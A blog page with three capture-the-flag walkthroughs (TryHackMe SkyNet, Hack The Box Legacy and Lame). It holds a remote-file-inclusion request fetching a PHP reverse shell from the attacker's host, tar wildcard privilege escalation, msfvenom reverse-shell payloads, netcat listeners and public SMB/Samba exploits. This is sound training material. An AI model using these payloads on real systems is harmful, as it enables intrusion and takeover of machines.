Skip to content

Tag: Hack The Box

THM- SkyNet

Recon

Network Enum

I ran a nmap scan on the target machine.

  • ssh (22): Worth exploring
  • http (80): Web server is running
  • pop (110): Maybe an email server is running?
  • netbios-ssn (139): Worth exploring
  • imap (143): Maybe an email server is running?
  • microsoft-ds (445): SMB is worth exploring

Web Enum

I ran gobuster to spider the directory in the web server

gobuster dir -u http://10.10.134.0:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40

From the scan result, I see these are directories found:

  • /admin
  • /css
  • /js
  • /config
  • /ai
  • /squirrelmail (this will be interesting to explore)

Most of the directories are restricted.

The squirrelmail page is working but I will need the login credentials.

I don’t have the credentials at the moment. So now the goal is to find out the email credential.

Service Enum

Now I am going to look at the SMB service running at port 445.

I ran the command to connect to the SMB’s anonymous share

smbclient //[TARGET IP]/anonymous

The files look promising to find a clue on how to get the email credentials.

I ran another command to get the content of the SMB share:

smbget -R smb://[TARGET IP]/anonymous

After inspecting the content, I found a list of possible passwords (maybe they belong to Miles?).

Using Burp Intruder, I brute-force the password with username (milesdyson).

Eventually, the password for milesdyson is cyborg007haloterminator

Once I login as milesdyson, I saw a bunch of emails. After reading one of the email, I saw that the SMB password for milesdyson was leaked.

To summarize, these are the found credentials:

Username: milesdyson

Email Password: cyborg007haloterminator

SMB Password: )s{A&2Z=F^n_E.B`

I tried to connect to the SMB milesdyson share with the username and password:

smbclient //[TARGET IP]/milesdyson -U=milesdyson

Then I manage to login to milesdyson share.

At first glance, most of the files are some machine learning pdf.

I went into the notes folder. There are a bunch of markdowns.

But I spotted a textfile named as “important.txt”.

Inside this important.txt file, I saw that milesdyson have a custom CMS with the link “

Spider the directory in the CMS.

Initially I had an issue because I didn’t put the backslash for the URL.

After I have done so, I ran this command:

gobuster dir -u http://10.10.134.0:80/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40

  • /administrator was found.

Navigate to this directory and I can see a CMS named “Cuppa CMS”.

Foothold

To summarize, I found three possible ways to gain a foothold into the system.

  • ssh
  • squirrelmail
  • Cuppa CMS

ssh

I tried to brute-force using hydra with username

hydra -l milesdyson -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-500.txt [TARGET IP] ssh

But this does not work.

Squirrelmail

I searched for possible exploits for squirrelmail (version 1.4.23).

There is an interesting exploit for RCE.

https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html

I followed the steps but the exploit does not work.

Cuppa CMS

I struggle to find the credentials to login to Cuppa CMS (tried with milesdyson credentials to see if password is reused).

I searched for Cuppa CMS exploit and this seems promising

https://www.exploit-db.com/exploits/25971

Basically, we can call a remote file without login to Cuppa CMS.

The examples given in the exploit

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Now I started a python server so that the CMS can call my shell files.

I tried a few ways to execute a shell.

For example, a basic php web shell with CMD param. But this does not work.

I look for more information about the configuration file.

http://10.10.134.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

It seems like there is a file extension restriction. For example, txt and jpeg are allowed. But php is not allowed.

I tried to create a php reverse shell and then change the magic number of the file to jpeg using hexeditor. This will make the Linux machine interpret the file as a jpeg file.

I started the nc listener.

I ran the command to call the php reverse shell:
http://10.10.134.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.4.3.145:8889/php-reverse-shell.php

This works and I have shell to the machine.

Immediately I enter the id and whoami command to check what is this account.

This account is “www-data”

I can also find the usr flag in milesdyson home directory

Now I gained a foothold, I will need to escalate privilege.

Privilege Escalation

I tried to use sudo but there is an error. It seems like the shell is “jailed”.

Basically we need to spawn a tty shell. (Link: https://netsec.ws/?p=337)

I used python command to spawn:
python -c 'import pty; pty.spawn("/bin/sh")'

Now I can sudo but this seems useless since I don’t know the password of the current user “www-data user”.

Then I ran some Linux enumeration scripts (lse.sh and LinEnum.sh).

It seems like the possible vectors are the crontab and the suid binaries.

I tried with the suid binaries and struggled because of the sudo issue where I don’t know the password. So much time wasted here

So I looked at the crontab. It seems like there is a backup.sh job executed by the root user.

I looked at the content of backup.sh:

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

So the root user cd into /var/www/html and then perform a backup.

Well I think I am in control of the /var/www/html folder.

I looked at the Linux PE checklist again and found a similar attack vector with the use of wildcard in tar.

https://app.gitbook.com/@bobbylin/s/oscp-playbook/privilege-escalation/linux-privesc#wildcards

I should follow the exact steps. I observed that I miss out one step.

I created two files:

touch /home/user/--checkpoint=1 
touch /home/user/--checkpoint-action=exec=shell.elf

Then I created the shell.elf in attacker machine and download in target machine.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=[ATTACKER IP] LPORT=3333 -f elf -o shell.elf

Now I started the listener at the correct port and wait.

After a few minutes, there are no connection from target machine.

This is when I took a hint and saw that there is something wrong with my shell file

I changed the command to:

touch "/home/user/--checkpoint-action=exec=sh shell.elf"

This works and I managed to connect as root.

Look for the root.txt under root directories.

HTB Writeup: Legacy w/o Metasploit

Overview

Recon

Quick Scan:

sudo nmap -sC -sV -O -oN nmap/quickscan.txt 10.129.125.96

Two services are identified:
1. netbios-ssn (port:445, likely to be SMB)
2. microsoft-ds

According to the scan result, the victim box is likely to be Microsoft Windows XP SP3 (94%) or Microsoft Windows Server 2003 SP1 or SP2 (92%).

nmap results

Enumeration

We can use nmap to check if the machine is vulnerable to any public CVEs.

locate *.nse | grep smb

Run the script to check the vulnerabilities.

sudo nmap –script smb-vuln* -p 445 -oN nmap/smb_vulns.txt <victim box IP addr>

We can also google for exploit relating to Windows XP SP3 and SMB.

From our enumeration, we can try these two exploits:
1. MS08-067
2. MS17-010

Exploit

MS08-067

Convert this script to python3: https://raw.githubusercontent.com/andyacer/ms08_067/master/ms08_067_2018.py

Start the netcat listener:

nc -nlvp 443

Get Local Machine IP:

ip addr | grep tun0

Generate the shellcode using msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=<LOCAL MACHINE IP> LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

Copy the shellcode to exploit.py script.

Run the exploit script (make sure you have pip3 install impacket).

Remember that the machine is Windows XP and likely to be SP3. So let’s choose choice 6.

python3 exploit.py <VICTIM BOX IP ADDR> 6 445

There will be a callback on the listener:

The root.txt is in the Desktop folder.

Reflections on the lab

It took me days to achieve a successful exploit. One of the reason is that I was spending two days on debugging python2 exploit scripts for MS17-010 (eternalblue). There is some issue in using pip2 to install impacket. Therefore I targeted MS08-067 instead.

  • If you are stuck with debugging issue, you need to time-box and move on. You can revisit the issue in the future. Eternalblue is one of the famous NSA exploit. I will definitely need to figure out how to fix the issues when running the exploit script.
  • I confused LHOST as the IP address of the victim box. Instead I should remember that LHOST is the IP address of the local VM.
  • You can enumerate issue using nmap as well and not just with searchsploit.
  • Convert python2 scripts to python3 scripts with online tool such as this.

HTB Writeup: Lame w/o Metasploit

Overview

  • Run two nmap scans to determine the open ports, services and OS.
  • Based on the discovered information, search for possible exploits.
  • Look for exploits scripts for each service versions for gaining root.
  • Test the exploits to see if the discovered services are exploitable.

Recon

nmap options

  • -O <Enable OS detection
  • -sC <Run default scripts>
  • -sV <Probe open ports to determine service/version info>
  • -oA <Output to all format>
  • -p- <Scan all ports>

Quick scan

sudo nmap -sC -sV -O -oA quickscan 10.10.10.3

Full scan

sudo nmap -p- -sC -sV -O -oA fullscan 10.10.10.3

We can see there is an additional service that is not discovered by the quick scan


Enumeration

We discovered five attack surfaces from our port scanning results. They are:

  1. ftp (port:21, version: vsftpd 2.3.4)
  2. ssh (port:22, version:OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0))
  3. netbios-ssn (port:139, version:Samba smbd 3.X – 4.X (workgroup: WORKGROUP))
  4. netbios-ssn (port:445, version:Samba smbd 3.0.20-Debian (workgroup: WORKGROUP))
  5. distccd (port:3632, version: distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

FTP

One convenient way of checking if the service version has an exploit is to use the searchsploit tool in Kali Linux. Here we can see that this particular FTP version has a reported exploit.

We can try googling for a python exploit. I found this in github:

https://github.com/ahervias77/vsftpd-2.3.4-exploit/blob/master/vsftpd_234_exploit.py

However, when I executed the script, the exploit was not successful. The script was stuck and did not progress further.

SSH

There were a few user enumeration attack on SSH. This usually takes time and we can come back if the other services are not exploitable.

Samba

This particular version of Samba has exploit available.

I found an exploit script in Python: https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py

You will need to update the script by following the steps below:

  • Get your LHOST:ip addr|grep tun0
  • Generate the reverse netcat buffer payload:msfvenom -p cmd/unix/reverse_netcat LHOST=<Your LHOST> LPORT=<Specify any port> -f python
  • Replace line 8 to 15 with the generated payload from msfvenom.
  • Update victim IP to the box IP address.
  • Remove line 1.
  • Install pysmb: pip install pysmb

Exploit

Samba

  • Start netcat: nc -nlvp 1337
  • Run the exploit: python3 exploit-smb-3.0.20.py

Now can run command now to get the FLAG in as the root user.


Reflections on the lab

This was the first lab that I have completed in Hack The Box (HTB). I learned a few things here:

  • This is abit different from purely web application hacking that I am more familiar with. You need to perform recon and systematically enumerate the services.
  • You need to know how to look for exploits, modifying and debugging the scripts that you found online.
  • You need to know some tools such as msfvenom, netcat and python etc.
  • Also port scanning needs to be thorough in order to discover more services that the quick scan does not find.